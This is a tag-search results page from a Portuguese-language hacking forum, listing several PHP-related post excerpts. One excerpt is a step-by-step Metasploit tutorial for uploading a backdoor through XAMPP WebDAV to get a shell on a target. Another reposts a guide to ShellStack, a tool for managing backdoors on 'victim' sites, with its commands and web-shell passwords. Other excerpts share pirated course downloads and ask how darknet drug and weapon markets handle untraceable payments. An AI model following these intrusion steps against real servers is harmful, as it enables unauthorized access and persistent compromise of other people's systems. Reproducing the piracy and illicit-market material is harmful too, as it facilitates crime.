Jump to content

Search the Community

Showing results for tags 'php'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Fsociety Brasil
    • Administration
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
    • Bug Bounty
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Location


Sex

Found 7 results

  1. Curso de PHP do Zero ao Profissional - Bonieky Lacerda‎ Tamanho Total: 21.3 GB Formato dos Arquivos: MP4/M4V Links: Parte 1:Download Parte 2: Download Parte 3:Download *Caso alguns videos não executar instale o K-Lite codec*
  2. EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT Bem pessoal, hoje vou lhes apresentar um exploit muito bacana no XAMPP que inclusive possui um módulo no Metasploit. Primeiramente, precisamos do Metasploit Framework no computador, certo? Ele possui tanto suas versões para Linux e Windows, através do site da Rapid7. Então, com o Metasploit instalado, vamos começar. Se você estiver no Windows, vá até a pasta do Metasploit e digite: msfconsole Ou console Caso esteja no Linux, instale com o install.sh ou mova os scripts do MSF para o "/root/bin". Pronto, quando o Metasploit carregar, digite: use exploit/windows/http/xampp_webdav_upload_php Após isso, irá carregar o módulo do exploit. Agora a gente irá setar as funções: RHOST, RPORT e EXPLOIT. No RHOST - A gente irá mencionar o nosso site/ip alvo. No RPORT - A gente irá setar a porta da conexão do alvo, pode ser 80, 8443, 8090,8033, 8080... Enfim. E no EXPLOIT - Nós iremos rodar o exploit e conseguir o Meterpreter no servidor, ou seja, upar a backdoor e ganhar a shell. Vamos lá então: set RHOST www.target.com set RPORT 80 exploit Ilustrações:
  3. João Escobar

    DARK_FILES

    O DARK_FILES está finalizado galera! Ontem postei sobre ele no Facebook pedindo ajuda na questão da criptografia e, hoje, após um dia inteiro trabalhando nele consegui fazer uma criptografia FODA e finalizá-lo! Pra quem tiver interesse em conhecer: http://darkfiles.hk.tn/ O QUE É: Hospedagem de arquivos 100% anônima (criptografia individual), limpa (sem anúncios/espera), segura e sem deixar rastros (server anon na Espanha, rs). Aqui seus arquivos 'dark' ficarão seguros. ~Por enquanto~ o upload máximo é 10MB, mas logo logo vai ser alterado pra mais. QUALQUER crítica/sugestão é muito bem vinda e vai ajudar muito. Fiz esse projeto pra estudo, com inspiração no antigo ObscuredFiles. Façam bom uso
  4. Uma ferramenta baseada em PHP que ajuda você a gerenciar todos os seus sites Backdoored de forma eficiente. O ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "HACKERS" que desejam manter uma faixa de cada site que eles cortaram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar o URL de backdoor no shells.txt presente no diretório da ferramenta. Com ShellStack você pode Importar shells PHP Obter detalhes do servidor Carregar arquivos do seu sistema usando seu terminal E acima de tudo, você pode gerenciar suas portas traseiras de forma eficiente Como usar git clone https://github.com/Tuhinshubhra/shellstack cd shellstack php shellstack.php generatebd saia utilizando CTRL + C Isso gerará um arquivo de backdoor no mesmo diretório que a ferramenta em um arquivo chamado backdoor.php Carregue o arquivo Backdoor para o site da Vítima Copie o URL do Backdoor e cole-o no arquivo shells.txt presente no diretório da ferramenta e salve-o ( Cada backdoor está separado por uma nova linha ) php shellstack.php Digite o número de série atribuído ao Backdoor O resto é bastante auto-explicativo Veja o vídeo aqui: Requisitos php curl Exemplo [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php ________________________________________________________________________________ _______ _ _ _______ _______ _______ _______ _______ _ _ |______ |_____| |______ | | |______ | |_____| | |____/ ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ ________________________________________________________________________________ Simple Backdoor Management System Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra Shout Out: LulZSec India ================================================================================ List Of Backdoors: 0. http://localhost/backdoor.php ============================================= [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 [+] Shell Selected: http://localhost/backdoor.php [+] Validating Backdoor: Backdoor Found! List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):2 [+] Server Info [i] Sending Request And Getting Response... [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 [i] Server IP: 127.0.0.1 Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):1 List Of Shells =============== [1] Dhanush shell {User & Pass : shellstack123} [2] B374K shell {Pass : shellstack123} [3] Kurama shell V.1.0 {Pass : red} [4] WSO shell {Pass : shellstack123} [5] MiNi shell {User & Pass : shellstack123} [#] Select Shell To Import(1-5):1 [i] Importing Shell... [i] Sending Request And Getting Response... [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):5 [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# Versão Versão 1.0 Screenshot Tutorial retirado do site: http://www.kitploit.com
  5. Acabei de lançar um espaço em meu projeto para softwares e aplicações que utilizem como base os princípios da matemática, segue link: http://webzhiak.com.br/apps/. Além de você poder utilizar o app em seu navegador, poderá ver o código fonte no github
  6. Acessando Métodos não estáticos, a partir de um método estático. Sabe-se que em PHP, não se pode usar o $this dentro de métodos estáticos. E que também ao acessar um método estático, o construtor não é executado. Então, utiliza-se muito de um hack method pra que não seja necessário instanciar a classe pra utilizar-se dos outros métodos não estáticos. Segue um exemplo: Método normal: Acessando de forma normal, classes não estáticas: <?php class Banco {// private static $Conn; function __construct(){ self::$Conn = new PDO('mysql:host=localhost;dbname=meuDb', 'root', ''); } public function consulta($queryString){ $stmt = self::$Conn->prepare($queryString); $stmt->execute(); return $stmt->fetchAll(); } }// {// Executando a consulta $db = new Banco;//Instanciando um objeto da classe Banco $dadosRetornados = $db->consulta("SELECT * FROM produtos");// Utilizando o método consulta, a partir do objeto criado. } O que acontece aqui é o seguinte... Temos uma classe que faz consulta no banco de dados e por padrão, temos de instanciar um objeto dessa classe pra que possamos utilizar de seus métodos de consulta. Acessando pelo hack method Acessando metodo sem ter que instanciar classes: <?php class Banco {// private static $Conn; private static $Instance; function __construct(){ self::$Conn = new PDO('mysql:host=localhost;dbname=meuDb', 'root', ''); } public static function run(){ if(is_null(self::$Instance)){ self::$Instance = new self(); } return self::$Instance; } public function consulta($queryString){ $stmt = self::$Conn->prepare($queryString); $stmt->execute(); return $stmt->fetchAll(); } }// {// Executando a consulta $db = Banco::run()->consulta("SELECT * FROM produtos"); } O que acontece no código acima é: Criamos um método estático, que retorna uma instância de objeto da própria classe. Ou seja, ao invés de termos de instanciar a classe por nós mesmos, esse método estática (Que lembrando, pode ser acessada sem que um objeto dessa classe seja instanciado anteriormente por ser static) faz isso por nós.
  7. Estive observando alguns marketplaces na darkweb e percebi que eles tem uma espécie de "carteira" própria, que gera endereços automaticamente para cada transação, fazendo com que cada uma delas seja única. Pesquisando um pouco mais, notei que existem APIs próprias de algumas empresas para fazer com que você possa processar pagamentos online e receber esse valor direto na sua carteira em determinada plataforma. Entretanto, alguns marketplaces vendem conteúdo não muito ortodoxo, como armas e drogas e isso implica que eles não possam usar essas APIs afim de não serem identificados, presos e processados por algum governo. Daí então vem a minha dúvida, eles tem um mecanismo muito similar ao das APIs, entretanto, são próprios, rodam no servidor dos próprios marketplaces, alguém tem ideia de como isso funciona ou de como fazer algo parecido?
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.